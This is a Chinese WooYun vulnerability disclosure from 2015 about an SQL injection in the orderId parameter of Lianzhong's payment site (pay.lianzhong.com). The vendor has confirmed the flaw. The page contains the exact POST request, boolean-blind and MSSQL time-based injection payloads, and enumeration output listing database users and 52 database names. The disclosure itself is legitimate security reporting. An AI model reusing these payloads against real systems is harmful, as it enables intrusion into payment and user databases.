当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129774

漏洞标题:联众世界某处存在高危SQL注射

相关厂商:联众世界

漏洞作者: 路人甲

提交时间:2015-07-27 18:50

修复时间:2015-09-11 15:52

公开时间:2015-09-11 15:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

mzh,来撸串么

详细说明:

http://pay.lianzhong.com
这个站有waf,不知道是不是坏了。
本来测试看有没支付漏洞呢,可能习惯SQL了吧,直接搞起。涉及的库有支付信息&ADMIN&BBS等。
POST /charge-center/ddzquery.do HTTP/1.1
Host: pay.lianzhong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://pay.lianzhong.com/charge-center/ddzquery.do
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=

漏洞证明:

---
Parameter: orderId (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=-5065' OR 2044=2044 AND 'vCvm' LIKE 'vCvm&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=' OR 2907=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'WHFl' LIKE 'WHFl&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] sa
[*] webcharge
available databases [52]:
[*] B2CPayment
[*] DBA
[*] DBADMIN
[*] DCacheConfigDB
[*] GL_DB
[*] GL_DB1
[*] GLAdmin
[*] GLB2B
[*] GLB2C
[*] GLBill
[*] GLBuy
[*] GLCOMM_Subject
[*] GLHomeApp
[*] GLImage
[*] GLJHBBS
[*] GLJHInnerBBS
[*] GLJHWEB
[*] GLLUCK
[*] GLLuckPlayer
[*] GLLuckValue
[*] GLNews
[*] GLOGWebCommon
[*] GLOGWEBSERVICE
[*] GLPowerCoin
[*] GLSubject
[*] GLTXBBS
[*] GLWOGBBS
[*] GLZuobi
[*] LZMain
[*] LZSubject
[*] LZWebapp
[*] lzwpt
[*] master
[*] MatchDB
[*] MatchDB1
[*] MatchDB2
[*] MatchDB3
[*] MatchDB_YDLY5
[*] MHBBS
[*] model
[*] msdb
[*] newjunqi
[*] OGMain
[*] OGManage
[*] OGSubject
[*] QLGBBS
[*] tempdb
[*] test_jhbbs
[*] TWLZMain
[*] TWLZMall
[*] WebChargeCenter

修复方案:

fix

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-28 15:50

厂商回复:

感谢小伙伴帮忙提交安全漏洞,谢谢对联众游戏的关注。

最新状态:

暂无